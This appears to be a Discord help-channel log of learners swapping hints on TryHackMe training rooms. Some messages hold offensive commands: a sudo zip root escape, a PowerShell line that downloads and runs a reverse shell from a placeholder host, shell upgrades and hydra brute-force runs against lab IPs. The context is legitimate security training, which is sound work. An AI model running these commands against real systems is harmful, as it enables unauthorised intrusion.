#room-hints
ok got a shell only it should give me root (i believe from the writeup) but it gave me the normal user back
jobs that get executed in a certain timeframe, each time
automated jobs to say it better
....
good question
am i just dumb or just not thinking too much today lol
will do that
thank you both
What is the purpose of the quotes in THM passwordattacks room, task 4, question 2 for crunch?
Metasploit: Exploitation room: I get the following error when I attempt to bruteforce the smbuser password using the metasploit wordlist and user set to penny: RubySMB::Error::CommunicationError An error occured reading from the Socket no implicit conversion of nil into String
what does no implicit conversion of nil into String mean? 😄
its the last answer to task 2
Hi everyone i just finished the TomGhost room.
I used this command
Dont click the spoiler if u dont want to know how to get root in that room
||TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF||
can anybody explain to me how this works? why did i just get a root shell from that, and is there a way to practise this knowledge? you can dm me or let me know here.
Thank you for reading.
will do thanks
Gave +1 Rep to @burnt rivet
is there another website that showcases how to exploit zip to get root another way?
or any other binary
i mean other website that can show other method
Hello everyone! I'm currently in the "Walking an Application" room and I'm stumped by the directory listing flag question. I've already done everything else in the room but that and I feel like I'm missing something very basic lol. I keep going to the website the room links to and adding "/.nav-collapse" from the page source, but I just get a page not found message on the website. Could I have a hint to point me in the right direction?
Usually the directories that are holding your resources like js files or any other files of that nature shouldn't be directly accessible, so figure out what that directory name is and if you can access it 🙂
Thank you very much!
Gave +1 Rep to @left thunder
can anyone help me with Corridor
I had a little idea of what to do but it seems pointless now.
|| hey im doing the Ignite room where im trying to get root, im trying a PATH privilege escalation but for some reason it doesnt work? does anyone know why? ||
I am not really sure about path exploitation but when i did that room i just read all the config files that could me something interesting.
ye i found the problem
anyone that can give me a mental push, im doing ignite room and the shell i have is so bad, i have upgraded with python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm/export TERM=xterm-256color. but still linpeas wont work or nano doesnt work properly.
You can background the shell with ctrl z, then take a note of column and row output of stty -a, then go back to the shell with stty raw -echo, fg and set the column and row number with stty row … and column ….
will try thank you
Gave +1 Rep to @lyric lichen
You‘re welcome
Since you gained access on the machine, what about getting another rev shell from there, which you can then use to upgrade like usual ?
hmm
smart one
i have just spent 5 hours on a room just to find out the password of root is in a file on the system
Room Learn Linux (web based), Task 21
how do i check
This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable.
What confuses you?
where do i check for test1234? in what directory
it says permission denied in ~/ and ./
yes but isnt that the username?
so i used export to set it. and how does that bit help with finding out the password for shiba3?
keeps saying permission denied
guys, need help, have a question on tryhackme like this "When sending data over TCP, what would you call the "small" data?" Does anyone know the answer?
English only in here please
guys, need help, have a question on tryhackme like this "When sending data over TCP, what would you call the "small" data?" Anybody know?
Which room and task is this for ?
Link the room pls where it's asking that
Or you saying it is for an assignment ?
can i send a print?
Well I would appreciate if you let me know if this is for a TryHackMe room or for an assignment ?
And if it's for a THM room, to let me have the link to the room
@left thunder https://tryhackme.com/room/introtonetworking
Here
Which layer is tcp ?
Since your answer is right in the text for that layer 🙂
There's a question missing there that I can't get right, the antepenultimate question there
Yes and I just gave you a hint for that question
brother, i did it, i reread everything again and paid more attention to layer 4 you mentioned and i found it bro, thank you very much, you are awesome
Need help hash lvl2 module
Flag.exe
Flag.exe
Sorry! You are still missing something. No flag for you yet. (7)
Anybody got hint for how to run this exe? If you try to run it you get that output.
where am i supposed to run it? at this point im confused on what im actually doing
in the home directory of shiba1
am i supposed to be logged in as shiba2 or 1?
so i need to set test1234 to something?
thanks it worked. but im so confused how does setting an env var allow to run a binary.
so this behaves like an if statement? as in it will only show the password when a specific env var is created with a specific value?
i got stuck on the shiba4 password now 😦
what should i do if im unable make a directory inside of home?
im doing crack the hash room and i need a little bit of help with hashcat command ( i know how to use it a little bit ) but the thing i dont understand the most is the result from hash-analyzer ... i would be able to choose mode from that analyzer but there are a few things that i dont understand so i cant really choose the mode for hashcat command ... i cant send ss in this channel maybe can someone dm me to help me? thank u
If you verify, you'll be able to send ss in here
!docs verify
Hi, I think I misunderstand something about this Question in task 9. Any hint?
i dont know what mode to use for hashcat in this case
Did you intercept a request, then right click into that request and check all the available options ?
proxy/options
Proxy Listeners
Intercept Client Requests
Intercept Server Responses
Intercept Websockets Messages
Response modification
Match and Replace
Tls Pass Through
Miscellaneous
?
right click on intercept request
scan
send to intruder/repeater/sequencer/comparer/decoder
request in browser, in original session/in current browser session
change request method / body encoding
...
copy as curl command
don't/do intercept request
URL-encode as you type
I tried these, but nothing matches the suggested pattern
i thought this was the only one
are they just directories inside the home directory ?
there is already a test dir and test1234 file in shiba3.
Right click on your intercept and just look in the sub menus
Try making a file in the /tmp directory. 99/100 that’s writable
Or maybe you already had your question answered idk I didn’t read every response I’m sorry
yes, thanks. the folders were already there. i got baited and spent too much time trying to create a dir.
Gave +1 Rep to @burnt rivet
Thx ! to @humble flame and @left thunder It's a bit confusing to miss the point this way, being fed up on the few last sub menus.
Gave +1 Rep to @humble flame
Hello guys, im trying to run john on a file but i'm not able to crack it. i'm using this input : "john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt", and as output im getting three lines which are: "Using default input encoding: UTF-8, Loaded 1 password hash, No password hashes left to crack" am i missing any parameter? ive done some research and this is supposed to work
any help would be nice
Yes
yes cant find nothing
ok needed to remove john.pot ty ty 🙂
Hi guys. I have been given ip: 157.90.147.52 and the challenge is to send back flag names. Does anyone know how to do it?
oh yeah
Hello Admin and everyone,
Please, I will be grateful if someone can help me out with the "breaching Active Directory" room. The reason is I'm trying to set up the DNS IP in the network manager settings and when I'm done with everything and i try to run the following command:
"nslookup thmdc.za.tryhackme.com"
it tells me:
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
Please, someone, help me out please, I really want to understand the Active Directory path. 🙇 🙏
Can you still visit the link?
Sometimes nslookup can be bugged.
It's still the same issue, sir
Or did I do anything wrong?
Can you cat /etc/resolv.conf
which ip do i use to ssh?
when i hit start machine, attackbox pops up in the split view
i will try restart that might fix it
is this a way to exploit in or is this useless information?
Hi guys
i have a little problem with last task ( privilege escalation) in the kenobi room
if i try to do
echo /bin/sh > curl
it doesnt put the /bin/sh command in a file curl
if i cat the curl file then
it just says /bin/bash
eh /bin/sh
Im not entirely sure if this is what you want, but try echo '#!/bin/bash' > curl ? then add the rest of your bash script
*im not in the room so im not sure what the instructions are
or /sh instead of /bash if you want
hello
room snort https://tryhackme.com/room/snort
task 3 According to the official description of the snort, what kind of NIPS is it?
I want hint for this task....
should I try every single word in the description...?
The answer can be found in this text.
ok thanks I found it
Gave +1 Rep to @lucid junco
hi guys im doing the alfred ctf right now
ive already logged into jenkins
now it says the following
Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
are these 2 different commands?
1-
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
or is that one command?
like i run the command like this now
it downloads the file from my python http.server, but i dont receive a connection on my netcat listener
Hi, in Wonderland room I find this poem. I'm not an expert in English. Should I read this poem carefully or it's just content of room ?
That is just content for the room, it's a poem from Alice in Wonderland.
Thanks
Gave +1 Rep to @digital hemlock
Hi, I am doing the lunizz room and i am at this point where I have to crack the password. My script runs an hour now, is this normal?
Hello i need help aha, i am on the "Intro to Digital Forensics: Task 3" . i am told to search google maps for the revealed gps coordinates and i have done it but i cant find the correct name for the answer XD
The GPS coordinates you get from exiftool are 51 deg 30' 51.90" N, 0 deg 5' 38.73" W. Remember to replace deg with ° and remove the space between the number and the ° symbol before searching.
ill double check aha
yeah, i tried it and it took me to a location however i couldn't find the correct street name. im going to do it again aha
Got it aha thanks :3
no problem
when i did it the first time it took me to a completely different location XD but i have gotten it now. thank you! :3
Hey everyone. Im currently working on the Enumerating FTP room in the cyber defense path. My NMAP scan of the IP seems to be taking an abnormally long time. Can anyone provide any input? Thank you!
I used: nmap x.x.x.x -p- -T4 and I get this warning now: Warning: x.x.x.x giving up on port because retransmission cap hit (6).
do you get the same thing when not using -T4?
also -p- is going to take a fairly long time
For the Burp Suite Task 8 Bonus question:
[Bonus Question -- Optional] Try performing the capture again, but this time monitor your requests in Wireshark. Can you see why live capturing the requests for this analysis can be described as "loud"?
What would I be looking for that would stand out besides just a lot of requests? I know there is a Wireshark room and I will do that but for now I started Burp Suite and wanted to know what specifically should be standing out in a Wireshark.
@wind nimbus you can also shorten that time by using :
nmap -p- -n -Pn -A [IP] ....it will be faster and most efficient
Hey guys, i stumbled over some rooms, that require you to use RDP to connect to a vm. Is there any solution on the attack box for rdp?
room: powershell
get-command and get-help are my friends, right?
Yeah i know, meant if there is anything preinstalled, i didnt know about, so i dont have to set it up all over again everytime
room/powershell was specially painful to deal with the delay in rdp 💀
weird I'd done most of the vulnet series, was going to do endgame then saw I haven't done just "vulnnet" yet haha
Hey, can anyone give me a hint for the room Madeye's castle
Nevermind 😎
Hum. that's actually quite a nice room. Steady difficulty throughout, nothing suddenly more complicated.
I've uploaded a php reverse shell script and have gotten a shell, but how do I run bash because the shell is currently so limited, can't cat files etc
have you done usual python3 -c
to stabilise shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
aaaah!
Thank you!
Gave +1 Rep to @muted parrot
a lot of these things are tempting to copy and paste but typing them endlessly just sticks them in. i think that and iex (new-object net.webclient).downloadstring('fffffff
I just wrote it out to try to understand the process
what does this do?
which, python3?
sorry iex is the powershell command for downloading (and executing) powershell scripts
it's just another one I type a lot :<
hahaha okay cool
so you can host a nishang reverse shell locally, and call it remotely to execute etc.
more to learn haha
always more to learn :-s
Speaking of which, I will make myself a nice coffee
thanks that stabilization worked a charm
with the python command sometimes you won't be able to call bash, just sh, so you'll do "/bin/sh"
I see
yeah you'll have a proper shell now that you can autocomplete and control c etc.
huge help, thanks!
👍 have fun. which box are you doing?
RootMe
Just left the final 2 questions months ago
and wanted to finish it
I think I tried to do it on day 2 of learning
Do we know what the reason is that I need to invoke python instead if something like /bin/bash -i ?
Usually these accounts don't have access to a shell. If you look at /etc/passwd you'll see who has shell access, usually exploiting web apps dumps you into www-data
www-data is the account that the web servers run on, but it's not an account you'll want to SSH into.
If you exploit some web app and pop a shell as root it usually means you're in a container 😭
So you use python, because it's always* on Linux, and pty is a default library, so you can use it to spawn process (bash) and control the process through your terminal
Bruh, can you help me solve the Wonderland machine? I'm stuck at user rabbit, I can't check perl, maybe you have a clue or hint? Give it to me
can someone help with the question "What do you need to access a web application?" (its 7 characters).
firefox, google, what they called?
browser
7 chars
thanks. i swear i tried that a couple times. I guess its time for bed then.
Gave +1 Rep to @languid isle
Hello Can anyone help me in room bufferoverflow brainstorm
the first question is how many ports are open
i use nmap every time i get 3 ports are open
but answer is 6
how can anyone clear me
did u scan all ports ?
Hi! I just need a hint for Confidential idk what tool I’m supposed to be using, any hints?
It would be on the provided vm
Did you fix it? I have the same problem. Some hint with something to decrease the rockyou list to a more compact list would be appreciated.
Testdriving a python script with an extremely large list is not handy. #mason #bcrypt #Lunizzctf #Lunizz
what is the exact command???
need some assistance doing the john the ripper room having trouble on encrypted zip files just with the taskfiles
And what's the trouble ?
Are you subscriber ?
how do you transfer ive tried with the clipboard but it doesnt copy the actual file just the text
yeah
Then you for example could just upload the files to a file host and download them inside the attackbox
Or just use scp
Credentials can be found when pressing the info button when having the attackbox open in split view
ohhh right ill give that a go thankyou brother
You are welcome
sftp should also work if you feel that scp is too complicated
looking through option of scp now lol yeah might go sftp
Can you help me with something of the password like length or first two characters so I can make a shorter list from rockyou.txt? I ran my Python script for hours. No clue where the fault is.
Why not use hashcat?
Can you help me with something more of the password like length or first two characters so I can make a short list from rockyou.txt? I ran my Python script for hours. No clue where the fault is.
Is that possible for this situation? Cost factor of 12, bcrypt is very cpu intensive and that is a challenge with my kali vm and rockyou wordlist is very large.
You can give it a shot, https://github.com/HashPals/Search-That-Hash
Try this, might give you an answer
Does that work with salts? Services like Crackstation, etc. work mostly for hash only and no salts.
Probably not but you can give it a try
The concept is nice, but no results with $2b$12$LJ3m4rzPGmuN1U/h0IO55.3h9WhI/A0Rcbchmvk10KWRMWe4me81e
Error: No types found for this hash.
Eh okay, looking at the writeups - brute forcing using the python file shouldn't take that long
Hi at the Hack Park ctf
it says the following
Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.
Run the following command but fill in the blanks:
hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form
to brute force a http post form
but that isnt how hydra works right?
what do u mean by this? how is it suppose to work?
In Burp Suite Basics Task 9 it asks for an 'option in a drop-down submenu' but I don't see anything that fits the * hint in the box... I'm using the same edition I believe but I might be wrong on that one. Thoughts?
You're looking for something that's inside a menu in the right click.
nvm... I see it now... not something I had ever used or had a reason to work with until just now
thanks for the push @lucid junco
Gave +1 Rep to @lucid junco
it's all in the do and don'ts... I had never thought about filtering what can trigger an unwanted response from a probed service
Can I get a hint on the Metamorphosis room? I can't get any footholds
hi, asking for a quick q regarding this:
i dont know what the 0x201c... string does but it seems to make a payload (?)
Did you try decoding it?
i am stupid, thanks. i get it now 🙂
i guess i was doing the conversion wrong
but i switched over to cyberchef and i get the full payload now
Hi Hackers can you help me to answer this question?
Use the tools introduced in task 2 and provide the name of the malware associated with the IP address
on Pyramid Of Pain room
I'm on Task 6 of Network Services room. I'm progressing ok but can't seem to do nmap scan for all ports with: nmap -p- [ip]
When I enter the command it gives:
Starting nmap 7.6
The cursor just blinks but nothing happens I've waited 40 minutes even. Am I missing something to scan all ports or is it my network?
Thank you @burnt rivet I can see it working now with verbosity. Yes, I tried a number for a range and got it by luck!
Gave +1 Rep to @burnt rivet
Hey 🙂
I am currently at room "Investigating Windows" and am stuck on the third question from the bottom i.e. "What was the extension name of the shell uploaded via the servers website?".
Can someone please give me a hint how to solve this.
I scanned the files in the TMP folder and tried to get some network logs or history but so far I couldn't find anything. All other questions I have already solved.
I am grateful for any help!
Hi, I'm just doing Linux Fundamentals Part 3, and I thought I wasn't dumb, but I'm a little stuck. When I am connecting to Python 3's server. I use python3 -m http.server in which I feel like I should and then the server just never connects, instead I get this screen where I can type but no commands can be used.
this command will host a server in the directory that you are in, it wont connect to a server
Can anyone give me a hint at skynet
room
so far i could log into the email with finding an anonymous smb share
In the email was a reset password
i tried that
to log into his smb share but it failed
With which user?
all the info you need is on the alert log
im trying
there's not many software in that log
omggg im soo dumb
i got it thanks
Gave +1 Rep to @tranquil parcel
without the and didnt work so i was like wtf ?
probably a good idea to not show the answer
Sorry
no worries, was just pointing it out
hello everyone
Can you give me a little hint
Why I cant brute ssh...
I'm going through "Basic Pentesting" room
I found staff.txt in Anonymous Samba, found 2 usernames
And I've already looked that I definitely need to do this
└─$ hydra -L users -P /usr/share/wordlists/rockyou.txt ssh://10.10.65.1
└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.65.1
But hydra cant find anything
[STATUS] 108.00 tries/min, 324 tries in 00:03h, 14344078 to do in 2213:36h, 13 active
Oh, it really did. Thanks)
I think it's a little silly to use such a long brute force in the room, but okay
Long? I don't think 5 mins is that bad
Okay, you know better, I'm a beginner)
Ye, the 5 mins mark is an acceptable time frame for everything bruteforce related here on thm.
If something is taking longer than that, it usually means you are doing something wrong.
Just so you know 🙂
doing overpass 1 > task 1
found Golang net/http server (Go-IPFS json-rpc or InfluxDB API) by scanning with nmap and admin page | download two files (overpass.go and buildscript.sh ) cuz they were given
the hint says owasp top ten vuln so i just wanna ask do i have to read more about Go-IPFS to know more about it or is there a way to approach it ... im not sure what to do at this point
check your cookies
also explore the sites code including the javascript code
Greetings, I would like some help, so im doing Task 13 in "What the Shell" room, but I cant figure out how can I send the shell.exe that I've created on the attack machine to the RDP windows account so I can run it and catch it using multi/handler on the attacking machine. How can I copy it to the target RDP?
thanks
Gave +1 Rep to @burnt rivet
how can i connect to rdp for the windows privesc path
hello i am stuck on Upload Vulnerabilities task 11 ( when i try to forward burpsuite to find /assets/js/upload.js it does not work )) can fix that?
rdesktop -u nameuser IP address
I've been working on the Surfer lab. I'm able to access the console, but not sure what to do from there. I'm given a bit more info about the server and the location of the flag, but I'm not able to access the flag since I'm not internal. Anyone have any tips?
i am also stuck in this exact spot
I feel like I'm overthinking it. @coral grotto I saw you completed it. Any tips?
I'm trying to use SSRF to grab the flag, but no luck
Been digging through the page source to find something else
Yup
I did not think of that...
got it! thanks @coral grotto
Gave +1 Rep to @coral grotto
No hints for new challenge boxes should be given immediately after a release (72 hours, by default) #rules
Musical Stego room has a problem with the second to last question i think. It says to use a github link instead of a pastebin link because it is down but i think the github link is down as well.
Can anyone give me a hint for the room "harder"?
can someone give me a hint to "tell nmap to scan all ports?"
man nmap
🤙
howdy folks. I'm working on the intro to c2 room, have armitage up, connected to target machine. I have the admin's hash, but could use a hint on how to get Ted's. Is there a way to swap user?
hashdump is throwing up an error for me
ah, figured it out. Needed to migrate processes for some reason.
for the b99 ctf, got the note and tried hydra on ssh with the user but rockyou doesnt seem to give anything back, any hints?
also my dirb scan gave no real interesting stuff
the sudo password is the same as the account password which you already got
Gave +1 Rep to @alpine kestrel
it did work this time??? if so nice and good luck with the exploiting
yuup as that tends to be how sudo works
it uses the users password and that password tends to be the same when logging in whether that is ssh or not
the exception is if it is a ssh key file
as those tend to just have an encryption password sometimes and that is not the users password so of course it does not work for sudo
Hello, can someone give me a hint for room "webenumerationv2" - I'm stuck on the Task6, Question5 and would appreciate some help 🙂
I found both virtual hosts from question4 and was scanning both for directories but could only find /js/ and /css/ on both
Well, i scanned both directories on both vhosts for -x.php,.flag,.txt - but maybe i misunderstood the hint?
Hmm i thought so but couldn't find any other directory no matter what i tried... i was using way more lists than mentioned in task5 but had no luck anyway
Yes - only there i think
i. e. "gobuster dir -u http://learning.webenum.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 20 -k"
Oh 🤦♂️ thank you
Gave +1 Rep to @burnt rivet
Good evening, I'm in room Windows Internals task 3. Its having me explore ProcMon and its asking me "What is the stack argument of the previous thread?" of notepad.exe, and the hint for the question "Listed as Thread in the event properties" I'm either misunderstanding or it is actually supposed to be the hint of the previous question
disregard I got it
Room: https://tryhackme.com/room/intermediatenmap
Question: Got SSH via one user, but a bit lost where to go. I suspect there's the other port I have to gain access via but I think I'm looking for a private key?
you connected via ssh?
then you should maybe look around on the server, there might be laying a flag 😛
I guess I just overthink everything... Ill look again
I'm so so blind, thank you
Gave +1 Rep to @earnest charm
you're welcome
In the nmap room what is the target machine, do I choose one, or did i miss something?
Target machine will be started by pressing the green "Start machine" button attached in one of the tasks
I have the attackbox started, I didn't know they were the same.
They are not the same
Attackbox is different than the target machine
Ok figured it out. Thank you.
Working on Network Services 2, specifically exploiting NFS and checking the permissions of the bash file. I was able to get a solution using ||sudo chmod +s bash|| and ||sudo chmod +x bash|| but I'm not getting the right permission set. My bash file has -rws--s--x whereas the prompt asks for a permission ending in -sr-x. Any idea where I went wrong?
Hi i am working on the Operating System Security. In the Practical Example of OS Security I am instructed to input ssh "sammie@MACHINE_IP" but i get "ssh: Could not resolve hostname machine_ip: Name or service not known"
The terminal example shows a different result with a login
"MACHINE_IP" doesn't look like an IP, right 😄 ?
So you most likely haven't even started the target machine
No IP is provided and if i use the attackbox IP the password is incorrect I have also used nmap to scan for hosts but none are alive
Ye, because you haven't started the target machine yet.
Attackbox is not the same as the target machine
Target machine gets started with a green "Start Machine" button in one of the tasks
In your case, that button is in task 3
oh... I did not realize that i had to start the target machine. Thank you so much.
yes, but it didn't seem to change the permission to be ending in -sr-x
You're right, but it's removing the rwx bits for group and other
Thus leading in having removed the r bit that you are missing
ah, I get it
So, does the order of it matter? ie chmod 600 then +[perm] and then +[perm2]?
Was able to execute bash despite not having the same exact perm the question asked for
Why would you use chmod 600 in the first place ?
Honestly, couldn't figure out why I didn't see the right permissions 😅
First thing my mind went to as I wasn't aware of the +x perm before
Unrelated, same room (Network Services 2) different question; task 9, enumerating MySQL, second question. How are we to extrapolate the password is ||password||? Looking up default login & pass is ||usr: root and no pass|| is there something I missed here?
guessing based on the top 100 most used passwords
probably
Could we use something like hydra to bruteforce a potential password? I tried this but hydra ends promptly after starting, stating 1 of 1 targets completed, 0 valid password found. Using this
You could try it 🙂 ?
But make sure to unpack your rockyou wordlist as well as using -P when specifying a wordlist for the password
Worked! Good eye for capitalizing p, thanks!
Gave +1 Rep to @left thunder
need some help getting john the ripper going
trying "john --wordlist=/usr/share/wordlists/rockyou.txt ssh.txt"
and its saying no password hashes loaded
What's the content of your ssh.txt?
a ssh private key
So you have no hash in there, thus it's saying no password hashes loaded 😉
Did you google how to crack ssh private keys that have a passphrase ?
As it would tell you that you have to use ssh2john first
i did not, thx
Alright, as a general advice, google first, ask later 😄
hello dear gods,
anybody keen on helping me with a horrific steganography CTF?
I've been looking for hours, but i'm completely stuck. I've been given a .jpg file, and cant find anything.
The flag format is "CTF{*}", and it should be somewhere hidden in the file i think.
The .jpg is too large to send in discord, even when zipped.
Here is the dropbox link, if anybody wants to help:
https://www.dropbox.com/s/h3pi7ow0opa6vyt/WhatDoWeDo.jpg?dl=0
First, the support channels are for tryhackme related questions.
So use #infosec-general for questions outside that scope pls.
Secondly, is this an active CTF ?
Couldn’t find the right channel to put it in. If it’s the wrong one i can move the post, ofc. And yes, it is an active ctf, not one from thm tho, notably. But i thought i’d try my luck here with some smarter heads than my own.
Couldn’t think of any other place to ask
It's fine, but unfortunately we do not help with active CTFs at all
I might have misunderstood the question. It’s not an active CTF as in a competition, or anything like that. It was from a ctf internally at work, but we didn’t receive any writeups after it was done. It was kind of like a training exercise thing for security awareness month
Gotcha, although a steganography CTF for security awareness seems a bit odd, we can't help you with it since we can not check on that due to being an internal work CTF, so basically the same applies 😦
cant get the exploit running for the steel mountain ctf
if it continues to act up ill just manually exploit it lol, but anyone got a guess?
The error seems to be straight forward ?
well my dumb half awake brain doesnt see it
Something very likely is already using port 8080 on your machine
It needs to be any port that is available for usage.
So no, using that port for your server listener and rev shell listener is very likely not going to work
hmm the user.txt gives 2 non recognized characters
Has anyone had issues in a room where they found the flags, but the answer blank wouldn't take them and/or the answers were out of order? Specifically, I'm having issues with the Jr. Pen Tester Path: Walking an Application, Task 3...the final two flags. Any help is greatly appreciated!
Got it...thanks!
Evading Logging and Monitoring task 10 the binary is just stuck any nudges on that???
Hi everyone! Is there someone that can help me with theseus room? i'm stuck at trying to get to athenes...
I found a file, a raw (data?) file, but strings seems to not find anything and binwalk (-Y) sees an arm 16bit binary in it but i'm not sure because ghidra and r2 gave me no clue
feel free to contact me in private if someone want to help me
Is there anything missing in my command as I'm waiting forever never hitting the right password hydra -l burgess -P clinic.lst 10.10.102.122 http-post-form "/login-post:username=^USER^&password=^PASS^:S=logout.php" -V -I -T 64 -f I modified the clinic.lst with the Single-Extra john rule.
Did you capture a login request to make sure you are using the right url ?
Yes, I also tried with /login-post/index.php
How many lines does wc -l clinic.lst say?
Mh, looks about right, have you tried restarting the target machine already?
This would be my next step! 🙂 Thanks!
Gave +1 Rep to @left thunder
i tried but couldnt figure it out?
"When will the crontab on the deployed instance run?" I checked the ||crontab edit||, and it shows an example of ||5 AM every week|| But the answer is only 7 characters long so what do I have to write in it if I've tried everything?
Okay nevermind, I didn't try the actual thing
but I found the answer
just did it like 5 mins ago lol Thank You!! anyways
Need hints in the last 2 questions of subdomain enumeration. I'm bruteforcing the machine but getting all errors
Okay disregard this one too, I got the answers after reading what errors I was getting lol .
Okay so I'm getting no ||usernames|| in task 2 of ||authentication bypass|| but the requests, some are errors and some are successful. I'm confused as to what I'm looking at
filtering the results doesn't help
perhaps your syntax is wrong?
Looks like your 2nd password parameter is wrong
Better to use copy paste instead of typing the command yourself
Actually both password parameters are wrong
Oh, I see where I went wrong, thank you!
Gave +1 Rep to @left thunder
ok guys im kinda stuck im doing the Bolt CMS room where i have to find the version of the CMS, i have tried a version scan on the port the output of that is " (PHP 7.2.32-1)" i have tried to use a CMS scanner that also did not work, i also looked on the source code + burpsuite to get any info ab the version but still no results. am i thinking too difficult? anyone that can give me a tip?
yes i figured it out
last weeks i have some problems with my dirbuster
its extremely slow
can i get a hint on the Zeno room?
Ran sqlmap and dumped a lot of stuff but that did not seem to be helpful
ran nmap and gobuster ... still nothing
did manual sql injection without any luck
Hi, I really want to get the fourth flag of theseus room, I spent half day to get the first three flags and in a week I was not able to get the last one, if someone made it, could he give me a hint? even in private.
All makes me think that is all about that incomprehensible (to me at least) a * * * * *e file but everything I tried (ghidra, r2, strings, xxd, binwalk and various text conversions) did not help at all...
Running gobuster or ffuf to fuzz a dir and google what technology it is using
task 4 exploiting SMB, after entering "get "Work From Home Information.txt" I enter cat "Work From Home Information.txt" but keep getting command not found.
Can you share screenshot?
!docs verify
And btw if you are doing cat in smb it wont work, you have to exit smb and then cat that text file
get *file* downloads the file from smb to your host.
doing the blue room as i still havent done it. now i remember again why
exploit hits a wall at triggering free at corrupted buffer and fails
and yes RHOSTS is set correctly
if it still doesnt work ill just try manual exploitation instead
Your LHOST is wrong.
You need to set the LHOST to your tun0
It's OK, it's a common thing people get wrong, I don't think the room mentions it.
it's all good. that's how you learn. now you know for the next time you set metasploit options
Thank you
Gave +1 Rep to @cold eagle
Thank you, that worked
When doing the "exploiting telnet" task. Am I supposed to be doing the active machine ip in red? Cause that 1 keeps coming up "no routes found"
no. "tun0" is the actual command that's used. it uses your host machine's ip
even "ip" is supposed to be typed out. it's not actually asking for an ip
well, "tun0" if you're using a vpn and "eth0" if you're using the attack box
Thank you
Gave +1 Rep to @wicked mirage
cheers
He should get 2, double assisted

!dark
Dammit.
Done with that already haha
on the new Benign room where are the splunk logs located at ?
go to search then select "All time" filter and then run in the query bar "*" and all the logs will be displayed
hi this might be a dumb question but how do i connect to the benign room's machine? connect via rdp?
web browser
i tried that way as well it didnt work
just go to the machine ip in a web browser and it will launch a splunk
lemme try again
no port 80
it worked ty!
just finished it. this one was pretty coool
Does anyone know a command that can be used for listing open ports that is not netstat, lsof, or ss and would fit into this answer format: ****** **********? I've been searching for a solution for ages now.
Room and task?
Room name: Linux Modules (https://tryhackme.com/room/linuxmodules)
Section: Other modules
4th Question
Somewhere here. 😄
Hmm oke
Thank you
Gave +1 Rep to @lucid junco
Figured it out 👍
Has anyone got any Tips on the Steel mountain room? I'm having issue replacing the service due to permissions
can you give me a nudge on Benign??
@dusky perch Please don't post massive text walls
Why am I not able to post pics?
There's no bot on the top right of my page
This is ridiculous just to get help. Where am I supposed to find this token crap? I shouldn't need to go through all this just to get help
I see the bot. It should be just under the discord admin group.
I messaged the bot and got some b.s response about a token. I don't use discord. I have no idea what it's talking about a token. But there's no token where that bot said it would be. Idk why I can have a link sent or something normal to be verified. I can't even post a pic showing what I'm talking about
This shits broken. I send everything it asked and it still says it can't verify.
I need to get these tasks done so who can inbox me so I screen screen shot my issue.????
Nvm. The fb group helped.
what is the "bs response"?
The token is found on your profile https://tryhackme.com/profile
Are you definitely trying to verify with the TryHackMe Bot?
Mate, chill out. Most of hacking is solving problems. If you're going to go off the deep end because you can't figure something out, you're not going to get very far.
active directory basics room doesnt give me a password or anything to login with
only username
Can you link?
Do you see the image with the credentials?
😂
Hi, I'm looking for a nudge for Benign. I'm on question 9 of Task 2 and I know the suspicious file, but I don't know how to look at it to find the pattern.
Thanks 👍
Gave +1 Rep to @trim haven
same here
Look for bak
I haven't been able to work on it, but I'll repost a question on #1035192394720751696 after I complete PrintNightmare, again! I guess I'm too used to Wireshark, and I'm expecting to see more.
Any hint on full registry path
I found it by using ProcDOT and just clicking on the Yellow boxes
Any hint on how to find the imposter?
Look for where ||powershell history|| is kept
I'm assuming you are on printnightmare, again and working on question 7 -- Am I right?
no I'm on Benign
ok, in splunk to the left there should be a filter for usernames, check there, closely.
yeah I figured it out I had to delete a few of the names to see the rest of them now I'm trying to figure out how to find the "Pattern"
any nudges on the The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?
for splunk challenge 1
im seeing the before and after events of the downloaded file but cant correlate to get the answer
ok guys and gals I'm stuck on Walking an Application Task 3 Question 3 and 4. I tried using /Assets + https://10-10-115-124.p.thmlabs.com/, since that's the directory listing in the page source code. But that's not it. Any hints or help I would greatly appreciate it.
n
e
Hey I want help for https://tryhackme.com/room/linprivesc this room Task 11
I am getting 'GLIBC_2.34'not found I checked my code many times and also I am doing everything correct then also
I am always getting this error
I'm stuck finding the first answer for
Windows Fundamentals 2 Task 2 question 1.
What is the name of the service that lists Systems Internals as the manufacturer?
But nothing in the text or the link provided in the text seems to point me in the right direction.
In System Configuration navigate to the Services tab and click ‘Manufacturer’ to sort alphabetically by the service manufacturer. Look for the service manufactured by ‘Systems Internals’.
thx!
Gave +1 Rep to @white tiger
Hi ! Im having an issue with the catregex room, I cannot find the answer to "
Match all of the filenames of question 4, except "File7" (use the hat symbol)"
I've tried [Ff]ile[1-9^7], [Ff]ile[^7][1-9], [^File7][Ff]ile[1-9] and nothing seems to work
I am having trouble with task 3 of this room https://tryhackme.com/room/furthernmap
the question is
How would you tell nmap to scan all ports?
and the answer is --version-all but the website is saying that its wrong i searched for other answers too but i found none which are 3 char
i did but found none
man nmap | grep "ports"
i got the flags for the "relevant" room but i want to do know what else i could do with nt authority\system role. or any extra vulnerabilities i can exploit?
no i cant find any
There is one there, Look under -p
I'm looking at it right now.
--exclude-ports ??
No, there is a 3 character* flag though.
ya
holla, need a nudge for privilege escalation on tomghost room, tried sudo, cronjobs, suid
i tried -sV its not correct
No, that's for something completely different.
sudo -l ?
i got it -p-
yep i was desperate
not allowed
the manuals for some tools is massive.
